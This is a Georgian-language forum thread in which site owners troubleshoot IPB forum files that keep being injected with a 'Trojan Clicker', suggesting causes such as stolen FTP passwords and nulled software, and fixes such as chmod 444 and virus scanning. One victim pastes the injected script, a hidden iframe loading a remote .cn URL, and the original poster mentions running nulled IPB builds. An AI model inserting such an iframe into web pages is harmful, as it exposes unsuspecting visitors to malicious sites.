IPB დაინფიცირდა, უცნაური შემთხვევა პარამეტრები

[K.C.]

მოგესალმებით ყველას. და მოდერატორთან დიდი ბოდიში წინასწარ , უბრალოდ ვერ მივიფიქრე სად შეიძლებოდა დამეპოსტა ეს ტოპიკი და ვინაიდან ეს ვებ განყოფილება იყო და ვინაიდან ჩემი პრობლემაც სწორედ ვებს ეხება და კერძოდ კი IPB ს. თუ მოდერატორი არ შეწუხდება და ამ ტოპიკს სხვა ადგილი ეკუთვნის ვთხოვ გადაიტანოს შესაბამის განყოფილებაში, ოღონდ ძალიან გთხოვთ წაიკითხოთ ტოპიკი.

საქმის არსი კი აი რაში მდგომარეობს, მაქვს საკუთარი სერვერი და საიტიც IPB ბაზაზე. კერძოდ კი დააპგრეიდებული ვერსია 2.1.7 დან 2.2.x ზე. რამდენიმე დღეა კი ხდება ესეთი რამ, index.php და index.html რომელიც კი მაქვს რუთ დირექტორიაში, ასევე ქვე დირექტორიებში ( როგორც ვიცით ყველა საქაღალდეში არის მოთავსებული index.html რათა ცნობისმოყვარე თვალები მოარიდონ შიგთავსს.) ვირუსდებიან Trojan Clicker_ით. საინტერესო კი ისაა რომ ეს ვირუსი მისით იცერება სკრიპტში ანუ ინდექს ფაილებში ჯდება თავისით რაც ძალიან მიკვირს, რამდენიმე მიზეზის გამო:

1. ამ დირექტორიებთან მარტო მე მაქვს შეხება და იქ ნამდვილად ჩემი ხელით ვირუსს არ ჩავტენი.
2. ეს მეორდება მისით და რაც მთავარია იწერება სკრიპში ისე რომ არ უშლის ზოგადად საიტის ფუნქციონირებას ხელს ანუ არანაირ ერრორს არ ვიღებთ ამ ვირუსის სკრიპტში მოხვედის შემდეგ.
3. ვირუსის სკრიპთი, არის ჯავა ენაზე დაწერილი, და არის კოდირებული ანუ ჩვეულებრივ რეჟიმში ის არის შემდეგი სახით ( echo 5466843.246874316764 ). აქედან გამომდინარე ვერ გავარკვიე რომელი საიტი თუ რა ან რას იძახებს ეს სკრიპთი.
4. შემდეგ იგივე სკრიპთი აღმოვაჩინე page_default.php _ ფაილში. ( თავდაპირველად ვიფიქრე რო მხოლოდ ინდექსებს დაერია. ეგრე არ აღმოჩნდა)

ამავე დროს მინდა აღვნიშნო, რომ სერვერი ფუნქციონირებს ლინუქსზე სადღაც 1 წელია. და ამავე სერვერზე არის ანონიმუს ფტპ, ანუ მომხმარებლები ტვირთავენ და იწერენ ჩემივე სერვერიდან.

რისი ბრალი შეიძლება იყოს ეს ყველაფერი?? ან ვთქვათ შეიძლება იყოს ეს IPB_ს ბრალი?? მე პირადად ძალიან მეეჭვება მაგრამ მეტი ვერაფერი დასკვნა ვერ გამომიტანია. როგორ შეიძლება ფტპ ზე დავირუსდეს რაღაც ფაილები ისე რომ იქ არავინ შევიდეს?? და თუ შევიდნენ რატო არ წაშალეს ვთქვათ მთლიანად საიტი??

რაც შეეხება ანონიმუს ფტპ სა და საიტის რუთ დირექტორიას დძალიან რადიკალურად განსხვავებულ საქაღალდეებში არიან განთავსებულები.
ამავე დროს მინდა აღვნიშნო ის რომ. საიტზე ასევე არსებობს სუბ დომენები რომელთაც არცერთი ფაილს არაფერი მოსვლია ნუ ჯერ ყოველ შემთხვევაში. და რომელთა საქაღალდეები მდებარეობს მომიჯნავე საქაღალდეში რუთთან.


P.S. ადმინისტრაციასთან ისევ დიდი ბოდიში, თუ თემა ძალიან უადგილოდ გავხსენი.
იმედი მაქვს ვინმეს ეცოდინება თუ რა შეიძლება ეშველოს ამ პრობლემას. საიტის მისამართს არ ვწერ რათა რეკლამად არ ჩამომერთვას. წინასწარ დიდი მადლობა.

[domen]

K.C.
პირველ რიგში - ძალიან, ძალიან დიდი მადლობა! :-) პირველად ვნახე თემა ასე კარგად ჩამოყალიბებული კითხვით (IMG:style_emoticons/default/biggrin.gif)

შენს პრობლემას რაც შეეხება, ძალიან გავრცელებულია - იმ მომხმარებლის კომპზე, რომელიც უკავშირდება FTP-ს, თუ აღმოჩნდა შესაბამისი ვირუსი, როგორღაც (დეტალებში პროცესი ჩემთვის უცნობია) ის იწერება FTP-ზეც და ჯდება ყველა index.* ფაილში (გამიკვირდა page_default-ის ამბავი, ეგეთი ჯერ არ გამიგია). მით უმეტეს, რომ შენს სერვერთან წვდომა ნებისმიერს აქვს, რისკი იზრდება. თუნდაც მოდიფიცირება გაუკეთო ფაილს, ხელახლა გახსნისას მაინც შეცვლის (IMG:style_emoticons/default/smile.gif)

პრობლემის გადაწყვეტის გზას ვერ გეტყვი ნამდვილად (IMG:style_emoticons/default/sad.gif) ერთი ვარიანტია, მომხმარებლებს შეუზღუდო უფლებები და ვებ-გარსით აატვირთინო ფაილები, მაგრამ მაქამდე მაგ ვირუსის მოცილება დაგჭირდება, ეგ კი არ ვიცი, როგორ ხდება (შეიძლება რომელიმე Linux ანტივირმა გიშველოს, ასევე არსებობს სპეციალური სერვერული ანტივირუსული პაკეტებიც).

[K.C.]

domen

მადლობთ რომ გამომეხმაურე, ეხლა რა ხდება, სამწუხაროდ ვებ გარსით ატვირთვა იქნება შეუძლებელი ვინდაიდან ჩემს ფტპ სერვერზე იდება საკმაოდ დიდი ფაილები რომელთა ზომა ხშირ შემთხვევაში აჭარბებს რამდენიმე გიგაბაიტს, თამაშები და ფილმები (1 გიგაბაიტდან დაწყებული 6-7 გიგაბაიტით დამთავრებული, ასევე ფილმები 600მბ დან და ზემოთ ).
აქედან გამომდინარე უბრალოდ ვერ გავაკეთებ ამას.
რაც შეეხება ვიღაცის კომპიდან ვირუსის სერვერზე მოხვედრას ეგ უკვე ვიფიქრე, მაგრამ ყველაზე საინტერესო ისაა რომ გოგორც ზემოთ აღვნიშნე სერვერზე ასევე არსებობს კიდევ ერთი IPB რომელსაც არაფერი მოსვლია, ასევე მანდვე დაინსტალებულია DLE, AIHS 2.1, VBulletin Torrent Tracker (მართალია ეს უკანასკნელი უბრალოდ აყენია,მაგრამ მაინც) .
ამ ჩამოთვლილთაგან არცერთი ფაილი არ დაინფიცირებულა, ანუ არცერთი სხვა ინდექს ფაილი არაა დაზიანებული დაედიტებული ამ ტროიანით, არც მეორე IPB არც DLE და ესაა რო მიკვირს. ვინაიდან ორივეში საკმაოდ არის ინდექსები, რაღა ამ მთავარ (უხეშად რო ვთქვათ) საიტს ეცა??? ერთი და იგივე სერვერში სხვა არ აინტერესებს ამ ვირუსს?? თუ ასეთი ჭკვიანია რო ტრაფიკს ხედავს და რომელსაც მეტი აქვს იმას აინფიცირებს?? ეს ხო ჩემი აზრით ნონსენსია?? (IMG:style_emoticons/default/huh.gif) თუ რაიმე მეშლება??
რაც შეეხება ანტივირუსს, აყენია ანტივირუსი რომელიც ვერ ხედავს ამ ვირუსს რატომრაც, მაგრამ რომც ხედავდეს მე მაქვს ერთი შიში (უხეშად რო გამოვხატო ჩემი აზრი) ვაითუ :
ვირუსის აღმოჩენის შემთხვევაში ეს ანტივირუსი მოიქცეს ისევე როგორც ვთქვათ Kaspersky AV ან Kaspersky IS, და უბრალოდ მიაშალოს დაინფიცირებული ფაილი?? მაგ შემთხვევაში მე ვრჩები როგორც მთავარი index.php და index.html გვერდების გარეშე (რაც ავტომატურად მტელი საიტის კვდომას გამოიწვევს ვინაიდან IPB_ის ყველა მიმართვა გადის ინდექსზე : მაგალითად [ http://compinfo.ge/forum/index.php?showtopic=1833 ] ასევე ყველა დირექტორიაში მდებარე ინდექსის კვდომა გამოიწვევს მთელი საიტის ღიად დარჩენას)
ამ შემთხვევაში მე სანამ მოვხვდები კომპიუტერთან და ნუ სანამ შევიტყობ ამ ამბავს მთელი საიტი რჩება ღიად ( მიდი მოვდივარ ) და მიხვდებით რაც შეიძლება მოხდეს.

დიდი ბოდიში ძალიან ბევრი ვწერე, მაგრამ ძალიან ვარ შეშფოთებული ამ ამბით, + ამას ნამდვილად არ მაქვს სურვილი ჩემი საიტიდან დავირუსდეს რომელიმე მომხმარებელი. მიუხედავად იმისა რომ ტროიან კლიკერზე ჩემთვის ცნობილი ანტივირუსების არქივიდან არაფერი საგანგაშო არაა თქმული (თუმცა შეიძლება ვცდებოდე).

თუ ვინმე შეძლებს რაიმენაირად დამეხმაროს ძალიან მადლობელი დავრჩები.

[student777]

მძივე შემთხვევა. პირველ რიგში გადააწერეთ ახალუ ფაილები თქვენ ფორუმს რომლებსაც არაქვს ვირუსი. ან და ანტივირუსით როცა დაიწყებთ სკანირებას წინასწარ ფორუმის რეზერვული ასლი გააკეთედ და ეგა. ან საერთოდ გააჩერეთ სერვერი რამოდენიმე ხნით მოხსენით HDD და მიუერთედ სხვა კომს და მანდ გაუშვით სკანირებაზე

თუ ვერსია გაქვთ ოფიციალური დაუკავშირდით მწარმოებელს

[K.C.]

student777

თუ ვერსია გაქვთ ოფიციალური დაუკავშირდით მწარმოებელს

(IMG:style_emoticons/default/laugh.gif) ლინუქსი მოპარული მანახა და არაოფიციალური და არ მინდა არაფერი (IMG:style_emoticons/default/biggrin.gif) სახლში მომდის ხოლმე კონვერტებით ეგ. რაც შეეხება HDD მოხსნას და სხვა კომპზე მიერთებას ეგ ძალიან ბევრ და ცუდ შედეგს გამოიწვევს საიტისთვის თუნდაც და როგორ გეჩვენება ეგეთი რაღაცის გაკეთება როგორ წარმოგიდგენია?? (IMG:style_emoticons/default/smile.gif)

პირველ რიგში გადააწერეთ ახალუ ფაილები თქვენ ფორუმს რომლებსაც არაქვს ვირუსი.

მგონი კარგად არ წაგიკითხავს რაც დავწერე (IMG:style_emoticons/default/smile.gif) ყველა ფაილიდან ამოღებულია ვირუსი (IMG:style_emoticons/default/smile.gif) და არანაირი ბეკაპის გადაწერა არ ჭირდება (IMG:style_emoticons/default/smile.gif)

ისე თსუს ფორუმი შენი აწყობილია მგონი ასე რომ, კარგად უნდა იცოდე ჩემი საიტი (IMG:style_emoticons/default/smile.gif) მგონი არ მაქვს საქმე ისე რო ვინმეს აზიანებდეს ჩემი საიტი, თან ვირუსის გამოვლინების შემთხვევებში მისი აღმოფხვრა და მომხმარებლისთვის გაუვნებელყოფა მოვახერხე ძალიან მალე (IMG:style_emoticons/default/smile.gif) ასე რო დაზარალებით არავინ დაზარალებულა (IMG:style_emoticons/default/smile.gif)
(IMG:http://crack.ge/gm_images/cross.gif) © არ დამიცავს მაგრამ ჩემი ძმაკაცის გაკეთებულია (IMG:style_emoticons/default/biggrin.gif) და იმედია არ ჩამომართმევთ რეკლამად (IMG:style_emoticons/default/smile.gif)


უბრალოდ მინდა ვიპოვო ამ ყველაფრიდან მარტივი გამოსავალი თორე ხელით მაგ ვირუსის გაქრობას არაფერი დიდი საოცრება არ ჭირდება, თუ IPB სტრუქტურა კარგად იცი რაც არ უნდა დაშიფრული იყოს ვირუსი აუცილებლად შეძლებ მის ამოცნობას და გაუვნებელყოფას (IMG:style_emoticons/default/smile.gif)

პ.ს. ძალიან გთხოვთ სანამ გამომეხმაურებით წაიკითხეთ რაც მიწერია, ვეცადე დაწვრილებით არმეწერა ყველაფერი.

[student777]

(IMG:style_emoticons/default/laugh.gif) მე IPB ვიგულისხმე და არა ლინუქსი თუნდაც RED HAT ის ლიცენზია კაი ფული ღირს

შენი გადასაწყვეტია თუ როგორ მოაშორებ ამ ვირუს ზემოდ არ სად გქონდა აღნიშნული რომ მარტივი გზით გსურს მოშორება.

რაც შეეხება კომირაიტებს ეგ არის მსოფლიოს ძალიან ბევრ საიტზე და თუ ვისი გაკეთებულია ვერავინ იტყვის (IMG:style_emoticons/default/wink.gif)



დანარჩენზე ნო კომენტ (IMG:style_emoticons/default/cool.gif)

[K.C.]

რაც შეეხება კომირაიტებს ეგ არის მსოფლიოს ძალიან ბევრ საიტზე და თუ ვისი გაკეთებულია ვერავინ იტყვის

დარწმუნებული ხარ?? (IMG:style_emoticons/default/laugh.gif) ეგ მოდი გუესტ მესიჯი ნამდვილად ბევრ საიტზეა (IMG:style_emoticons/default/smile.gif) მაგრამ ამ სურათით მინახე პლზ (IMG:style_emoticons/default/smile.gif) და მანახე (IMG:style_emoticons/default/smile.gif) ეგ იკონკაც და ღილაკიც სპეციალურად იყო მწვანე ფერში გაკეთებული ეკო სკინის შესაბამისად მაშინ ის იყო დეფაულტ (IMG:style_emoticons/default/wink.gif)
მაგრამ მაგაზე არ მსურს საუბარი ოფფ ტოპიკი გამომდის (IMG:style_emoticons/default/smile.gif)

[სტუმარი "otosaxel"]

K.C.
სალამი!
ცუდი რამე მგოსვლია (IMG:style_emoticons/default/sad.gif)
1)მოკლედ მაგ ფილების მოდიფიცირება შეიძლება ხდებოდეს რაიმე შკრიპტის მხრიდან (რაც 99%-ი, გამოირიცხა შენივე ნაწერის მიხედვით), ამ შემთხვევაში საშველი ერთია CMOD (იგივე file permision-ის დაწევა) 664 მდე, ან უფრო დაბლა (IMG:style_emoticons/default/smile.gif) , მარა შეიძLება მთავარ საიტს შეესია მარტო იმიტომ რომ დიდი მოთხოვნაა სხვა სუბდომეინებისგან განსხვავებით
2)ან ატვირთვის დროს ლოკალურ კომპზე ჯდება ვირუსი, თუ ეს მორეა მაშინ ლოკალური სისტემა გადააყენე და ისე ატვირთე შემდეგ ipb.
3) ცუდი ვერსია იშოვე, ალბათ განულებული არა? თუ ეგრეა მაშინ ნულერმა თავისი შკრიპტიც მიაყოლა რომელიც გიქმნის ამ სიტუაციას
ცადე ipb-ის ACP-დან anti-virus-ის გაშვება, გადაამოწმებს ფაილებს და შეიძლება იმ ხულიგანსაც მიაგნო.
4) ftp-ის პაროლი ვინმემ გაიგო და ასე "გეხუმრება", არც ამის გამორიცხვა არ შეიძLება, სუფთა სისტემიდან შედი შენი სერვერის სამართავ პანელში და იქიდან შეცვალე პაროლი და index.* ფაილები გაასწორე.
5) იქნებ სერვერია დაინფიცირებული?! (ზედა ნაწერის მიხ. სხვა შრკიპტების დაინფიცირებაც მოხდებოდა, მაგრამ ნურც ამას გამორიცხავ) და ამ ფაილებზე დიდი მოთხოვნის გამო სწორედ მანდ ჯდება (ყველაზე ხშირად ხომ გამოდის რომ საიტზე index.php-ზე მოდის მოთხოვნა და სხვა პაპკებზე), არ იქნება ურიგო პროცესებს გადახედო და სისტემა შეამოწმო (სერვერის).


ესეც ლინუქსის ერთერთი ანტივირი, კარგიაო ვერ იტყვი მარა ეს დგება http://www.clamav.net/
ასევე ცადე შენი შკრიპტის (რომელსაც ვირუსი აქვს) აქ შემოწმება http://www.virustotal.com/ თუ ვირი ცნობილია ბოლოში დეტალურ ინფოს დაწერს, და გაიგებ რისი ბრალი იყო

ამხელა და ესეთ დეტალურ კითხვას მეტი პაუსხი უნდა, ბოდიში მეტი ვერ დავწერე

[სტუმარი "otosaxel"]

6) რამე მოდი ხომ არ დაააისტალე და იმის მერე დაიეწყო ეგ გაბერვები, შეიLება იმ მოდშI იყო ეგ ვირუსი და გივირუსებს ფორუმს

[K.C.]

otosaxel

მადლობა გამოხმაურებისათვის (IMG:style_emoticons/default/smile.gif)

1)მოკლედ მაგ ფილების მოდიფიცირება შეიძლება ხდებოდეს რაიმე შკრიპტის მხრიდან (რაც 99%-ი, გამოირიცხა შენივე ნაწერის მიხედვით), ამ შემთხვევაში საშველი ერთია CMOD (იგივე file permision-ის დაწევა) 664 მდე, ან უფრო დაბლა , მარა შეიძLება მთავარ საიტს შეესია მარტო იმიტომ რომ დიდი მოთხოვნაა სხვა სუბდომეინებისგან განსხვავებით

CHMOD წესრიგშია რაოდენ გასაოცარიც არ უნდა იყოს (IMG:style_emoticons/default/smile.gif)

3) ცუდი ვერსია იშოვე, ალბათ განულებული არა? თუ ეგრეა მაშინ ნულერმა თავისი შკრიპტიც მიაყოლა რომელიც გიქმნის ამ სიტუაციას
ცადე ipb-ის ACP-დან anti-virus-ის გაშვება, გადაამოწმებს ფაილებს და შეიძლება იმ ხულიგანსაც მიაგნო.

ამ ნულ ვერსიას ვიყენებ სამ საუკუნე ნახევარია (IMG:style_emoticons/default/biggrin.gif) არა ნული ბრალი ნამდვილად არაა (IMG:style_emoticons/default/smile.gif) მაქვს ამავე სკრიპტის ვერსიის 2 სახის ნული (IMG:style_emoticons/default/smile.gif) DGT Null და VST Null ორივე 100% მუშაა, გამოცადა დრომ.

4) ftp-ის პაროლი ვინმემ გაიგო და ასე "გეხუმრება", არც ამის გამორიცხვა არ შეიძLება, სუფთა სისტემიდან შედი შენი სერვერის სამართავ პანელში და იქიდან შეცვალე პაროლი და index.* ფაილები გაასწორე.

ფტპ პაროლი გაიგო და ტროიანების ჩასმის მეტი საქმე არ აქვს?? (IMG:style_emoticons/default/huh.gif)

5) იქნებ სერვერია დაინფიცირებული?! (ზედა ნაწერის მიხ. სხვა შრკიპტების დაინფიცირებაც მოხდებოდა, მაგრამ ნურც ამას გამორიცხავ) და ამ ფაილებზე დიდი მოთხოვნის გამო სწორედ მანდ ჯდება (ყველაზე ხშირად ხომ გამოდის რომ საიტზე index.php-ზე მოდის მოთხოვნა და სხვა პაპკებზე), არ იქნება ურიგო პროცესებს გადახედო და სისტემა შეამოწმო (სერვერის).

შეიძლება, ეს დავპოსტე კიდეც, მაგრამ სხვა ფაილებისკენ ეს უპატრონო ვირუსი რო არც იხედება?? (IMG:style_emoticons/default/blink.gif)

ესეც ლინუქსის ერთერთი ანტივირი, კარგიაო ვერ იტყვი მარა ეს დგება http://www.clamav.net/
ასევე ცადე შენი შკრიპტის (რომელსაც ვირუსი აქვს) აქ შემოწმება http://www.virustotal.com/ თუ ვირი ცნობილია ბოლოში დეტალურ ინფოს დაწერს, და გაიგებ რისი ბრალი იყო

clam მიყენია მაგრამ სულ ცალ ტუფლზე აქვს ეგ ვირუსი არ ხედავს თუ ვერ ხედავს მოკლედ არ შველის ეგ ჯიგარი მაგ საქმეს სამწუხაროდ.... (IMG:style_emoticons/default/mellow.gif)

6) რამე მოდი ხომ არ დაააისტალე და იმის მერე დაიეწყო ეგ გაბერვები, შეიLება იმ მოდშI იყო ეგ ვირუსი და გივირუსებს ფორუმს

საიტზე ბოლოს მოდი როდის დავაყენე აღარც მახსოვს (IMG:style_emoticons/default/smile.gif) ამოვწურე თითქმის ყველა შესაძლო მოდი როგორც 2.2.x დან ასევე 2.3.x რომელიც რაღაც ნიუანსით მაინც მომეწონა ყველა მიყენია, ამ მოდების დაყენების ბოლო თარიღად დაახლოებით შეიძლება ავიღოთ 5-6 თვე თუ მეტი არა, ნუ თუ არ ჩავთვლით რაღაც ნიუანსების შეტანას რომელიც მოდი არცაა უბრალოდ ხელით შემაქვს ხოლმე რაღაც ცვლილება CSS_ში ან HTML ში ACP_დან ხანაც php_დან (IMG:style_emoticons/default/smile.gif)

მოკლედ საშველი არსაიდანაა (IMG:style_emoticons/default/huh.gif)

[Power_VANO]

K.C.
აჰა, გასაგებია შენი პრობლემა და გამოსავალიც მარტივი არსებობს - CHMOD-ი (IMG:style_emoticons/default/smile.gif)

ეხლა თეორიულად რომ შევხედოთ, რას აკეთებს ეგ ვირუსი? სიტყვაზე ზის სერვერზე და მაგ IPB-ს ფაილებს აინფიცირებს ხომ? და აინფიცირებს რატომ/როგორ? იმიტომ, რომ WRITE უფლება აქვს ფაილებზე. ანუ შენი მიზანია, დავირუსებული ფაილებიდან ამოშალო ვირუსის კოდი და CHMOD დაუყენო არა 644-ზე (ამ დროს WRITE უფლება მაინც რჩება), არამედ 444-ზე, როცა მარტო READ არის ნებადართული. შედეგი იქნება ის, რომ ვირუსი ფაილებს ვეღარ დააინფიცირებს, იმიტომ, რომ WRITE უფლება აღარ ექნება.

ესეც ესე, პრობლემაც გადავჭერით (IMG:style_emoticons/default/smile.gif)

P.S. პრაქტიკაზე მაქვს ეგ მეთოდი გატესტილი, საკუთარ საიტზე და მუშაობს 100%-ით (IMG:style_emoticons/default/smile.gif)

[K.C.]

Power_VANO

ეხლა თეორიულად რომ შევხედოთ, რას აკეთებს ეგ ვირუსი? სიტყვაზე ზის სერვერზე და მაგ IPB-ს ფაილებს აინფიცირებს ხომ? და აინფიცირებს რატომ/როგორ? იმიტომ, რომ WRITE უფლება აქვს ფაილებზე. ანუ შენი მიზანია, დავირუსებული ფაილებიდან ამოშალო ვირუსის კოდი და CHMOD დაუყენო არა 644-ზე (ამ დროს WRITE უფლება მაინც რჩება), არამედ 444-ზე, როცა მარტო READ არის ნებადართული. შედეგი იქნება ის, რომ ვირუსი ფაილებს ვეღარ დააინფიცირებს, იმიტომ, რომ WRITE უფლება აღარ ექნება.

ამაზე ვიფიქრე მაგრამ , 444 ის შემთხვევაში თუ მას მივანიჭებთ საქაღალდეს ის ფტპ დან უბრალოდ ქრება, ანუ მისი ნახვის უფლება მემბერსაც ერთმევა და გამოაქვს შეტყობინება 403 (IMG:style_emoticons/default/smile.gif) ფაილზე ვცადე და ფაილს მიჩვენებს მაგრამ, IPB მიმართვები ვინაიდან მაგ ინდექსე გადის არ შემექმნება არანაირი პრობლემა??? ანუ იმუშავებს ყველაფერ ნორმალურად?? (IMG:style_emoticons/default/smile.gif)

[Power_VANO]

K.C.
მთლიანად საქაღალდეზე არაა საჭირო, მარტო იმ ფაილებს უნდა ეგ, რომელიც ვირუსდება. პრობლემა არ შეიქმნება, იმიტომ, რომ index-ფაილებში ჩაწერა არ ხდება არაფრის (IMG:style_emoticons/default/smile.gif)

[K.C.]

Power_VANO

მთლიანად საქაღალდეზე არაა საჭირო, მარტო იმ ფაილებს უნდა ეგ, რომელიც ვირუსდება. პრობლემა არ შეიქმნება, იმიტომ, რომ index-ფაილებში ჩაწერა არ ხდება არაფრის

მადლობა ჯიგარო (IMG:style_emoticons/default/smile.gif) ვცდი თუ კიდე დავირუსდა ეხლა ეჭვი მივიტანე გოოგლეს ტრაფიკის კონტროლერზე და ამოვიღე თუ კიდე მოხდა როგორც იტყვიან დავჩმოდავ (IMG:style_emoticons/default/biggrin.gif)

[Power_VANO]

K.C.
არაფერს (IMG:style_emoticons/default/smile.gif) ეჭვი რაზე, Google Analytics-ზე?

[K.C.]

Power_VANO

არაფერს ეჭვი რაზე, Google Analytics-ზე?

კი გოოგლეს ანალიტიკზე (IMG:style_emoticons/default/smile.gif) მისი ჯავა სკრიპტის ჩაკვეტების მერე დაიწყო როგორც გამოვთვალე თარიღებს რო დავხედე და შეიძლება რაღაც არ ვიცი რა გზით რაიმე სახით შემომიძვრა ეს ჯიგარო ტროიანი (IMG:style_emoticons/default/smile.gif) რავიცი ამოვიღე და ვნახოთ რა (IMG:style_emoticons/default/mellow.gif)

[K.C.]

რაოდენ საოცარი და საკვირველიც არ უნდა იყოს არ ვიცი უბრალო დამთხვევაა თუ რა, მაგრამ ....
გუგლის ანალიტიკის მთავარი index.html დან ამოღების შემდეგ ჯერ არ დამფიქსირებია შემთხვევა მაგ ტროიანის გამოჩენისა (IMG:style_emoticons/default/huh.gif) შეიძლება უბრალოდ დაემთხვა რაიმე და შეიძლება კი მიზეზიც ეგ იყო, იმიტომ რომ რომელიღაც ფორუმზე რუსულზე ოღონდ, მქონდა ამოკითხული რომ, თუ საიტში გაქვს ჩადებული ისეთი ჯავა სკრიპტები რომლებიც რაღაც ეგეთს აკეთებენ სავსებით შესაძლებელია რო ეგ როგორც ბაგი ისე გამოიყენოსო სხვადასხვა ჰაკერმა ან ვირუსმაო (IMG:style_emoticons/default/blink.gif) აი ასეა ჯერ ჯერობით საქმე თუ რამე სხვას გავარკვევ დავწერ იმიტო რო ბევრ საიტს Myweb ზე ჰქონდა იგივე შემთხვევა, და მე თუ საკუთარ სერვერზე მომივიდა შეიძლება ვინმეს უფასოზეც შეემთხვეს (IMG:style_emoticons/default/smile.gif) )

[Power_VANO]

მდაა... საინტერესოა ნამდივლად (IMG:style_emoticons/default/smile.gif)

[სტუმარი "otosaxel"]

გუგლის ანალიტიკის მთავარი index.html დან ამოღების შემდეგ ჯერ არ დამფიქსირებია შემთხვევა მაგ ტროიანის გამოჩენისა

მდა, კიდევ ერთი მაიმუნობა გუგლის სახელზე (IMG:style_emoticons/default/tongue.gif) , ეხლა არ დამიწყოთ ესეც ტულბარივით და სირჩებივით დამთხვევაააო (IMG:style_emoticons/default/laugh.gif)

K.C.
მერე როგორ იქნება შეგვატყობინე საინტერესოა გუგლუგი ამრთლა დამნაშავეა თუ არა.

[K.C.]

otosaxel

მდა, კიდევ ერთი მაიმუნობა გუგლის სახელზე , ეხლა არ დამიწყოთ ესეც ტულბარივით და სირჩებივით დამთხვევაააო

არა არ ვიცი დამთხვევაა თუ რაა, მაგრამამ ჯერ ჯერობით სიმშვიდეა არ ვიცი აწი რა იქნება მაგრამ ეხლა ჩავსვი ბოარდ ჰეადერსა და ვრაპერში ნუ ვნახოთ ყოველ შემთხვევაში რაც ინდექსიდან ამოვიღე სიწყნარეა, მაგრამ როგორც მე წავიკითხე გუგლი კი არ ავირუსებს (IMG:style_emoticons/default/biggrin.gif) არამედ მაგ ჯავა სკრიპს იყენებენ როგორც ბაგს (IMG:style_emoticons/default/smile.gif)

[Power_VANO]

K.C.
შენა და, ინდექსში რატომ ჩასვი თავის დროზევე? სკინის მენიუდან Wrapper-ში/Board Header/Footer-ში უნდა ჩაგესვა თავიდანვე ეგ.

[suckers]

ჩემიც ეგრეა არაა თუ რა ? (IMG:style_emoticons/default/sad.gif)
მარტო index.php კიარა ყველაფერს დედა უტირა :|
თავისით ჩაემატა ფაილებში რაღაც კოდები და გამიფუჭდა ეგრე IPB -ს ფორუმი : D
რამე გაარკვიეთ როგორ უნდა ვუშველოთ ?



ისე სხვათაშორის IPB-ს ფორუმში ადმინის პანელში რო შედიხარ ამას ხოარ გიწერს ? :|
ჩემთან წინა ფორუმზე ამის წერით დაიწყო ყველაფერი და მერე საბოლოოდ გამიფუჭდა (IMG:style_emoticons/default/sad.gif)

IPB 2.2.2 მიყენია (IMG:style_emoticons/default/smile.gif)

(IMG:http://mediapix.ru/pics/5d440385e373d057545a00cfadec3ce4.jpg)





=======================================
ხალხნო გუგლი კიარა რამბლერ.რუს დედა მოვტყ......

აი ეს სკრიპტი დაემატა ფაილს


?><!-- Rambler.Ru --><script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/tds/in.cgi?4" width=0 height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script><!-- Rambler.Ru -->



აუ ეხა ეს ფორუმიც თუ გამიფუჭდა არვიცი რა (IMG:style_emoticons/default/sad.gif)

K.C.
აჰა, გასაგებია შენი პრობლემა და გამოსავალიც მარტივი არსებობს - CHMOD-ი (IMG:style_emoticons/default/smile.gif)

ეხლა თეორიულად რომ შევხედოთ, რას აკეთებს ეგ ვირუსი? სიტყვაზე ზის სერვერზე და მაგ IPB-ს ფაილებს აინფიცირებს ხომ? და აინფიცირებს რატომ/როგორ? იმიტომ, რომ WRITE უფლება აქვს ფაილებზე. ანუ შენი მიზანია, დავირუსებული ფაილებიდან ამოშალო ვირუსის კოდი და CHMOD დაუყენო არა 644-ზე (ამ დროს WRITE უფლება მაინც რჩება), არამედ 444-ზე, როცა მარტო READ არის ნებადართული. შედეგი იქნება ის, რომ ვირუსი ფაილებს ვეღარ დააინფიცირებს, იმიტომ, რომ WRITE უფლება აღარ ექნება.

ესეც ესე, პრობლემაც გადავჭერით (IMG:style_emoticons/default/smile.gif)

P.S. პრაქტიკაზე მაქვს ეგ მეთოდი გატესტილი, საკუთარ საიტზე და მუშაობს 100%-ით (IMG:style_emoticons/default/smile.gif)

ეს ვქენი ეხა =) და ადმინის პანელში იმ ერორს აღარ მიჩვენებს აი სურათი როა ^ ზემოთ ჩაგდებული.

ესე ვქენი წინა ფორუმზეც უბრალოდ მერე CHMOD 444-ზე არ გადამიყვანია ის ფაილი და შემდეგ სხვა ფაილებიც დაინფიცირდნენ და გამიფუჭდა ფორუმი.

[ja_ja]

მოკელდ ყველას ვურჩევ შემდეგ რაღაცას.

1. იგივე შეტევა ტავის დროზე ჩვენს საიტზეს სინჯეს, მაშინ ვიყავით service.net.ge-ს ჰოსტინგზე.
2. ყველა index-სახელის ფაილში ენმატედობა ხან ტავში ხან ბოლოში არასაჭირო კოდი


სიტუაცია იგივე იყო რასაც აღწერთ, მინიმუმ 5-ჯერ ვსინჯე index-ფაილების საწყისი ვერსიების ატვირთვა, შველა ყოველთვის დროებითი იყო 2-5 დრე, მერე იგიევე მეორდებოდა.

მოძიებული ინფორმაციით მიზეზი აღმოჩნდა 3, თუმცა სხვა შემთხვევაში შეიძლება მეტიც იყოს, ან 1-იც საკმარისი იყოს.

1. ასე თუ ისე ტყდება FTP პაროლი და მერე ახსნა საჭირო აღარაა, გატეხვის იოლი მეთოდია თვითონ ადმინ პანელი.
2. იგივე ადმინ პანელის მეშვეობით თრეულობენ შესაბამისი იუზერის უფლებას და სკრიპტებით ემატება ყველაზე გავრცელებულ ფაილებში (კერძოდ index.php, index.htm და ასე შედმეგ) შემტებვის კოდი.
3. შესაძლოა ამა თი ინ დვიჟოკების გარკვეული შეცდომის გამო თვითონ დვიჟოკს აიძულო ჩაამატოს საჭირო ტექსტი შესაბამის ფაილებში.


გამოსავალი რამდენიმეა.

1. ცვალეთ FTP-ს პაროლები
2. მისდიეთ სკრიპტების აბდეიტებს
ეს ორივე არის სტანდარტული ქაჯობა, ისეთი პონტია რა თავიდან გიცილებს ყველა, აგერ განაახლე და ვსიო.


ყველაზე მოქმედი აღმოჩნდა CHMOD 444 მორჩა რომ გასკდეთ თქვენც ვერ ჩამატებთ მაგ ფაილში ვერაფერს.

სამაგიეროდ წყნარად ხარ, საჭიროა რაიმეს ჩამატება შენს ლოკალურ სერვერზე აკეტეს ცვლილებას, და მერე იმის ატვირთავს ვახდეს, ისევ CHMOD 444 და ასე შემდეგ.

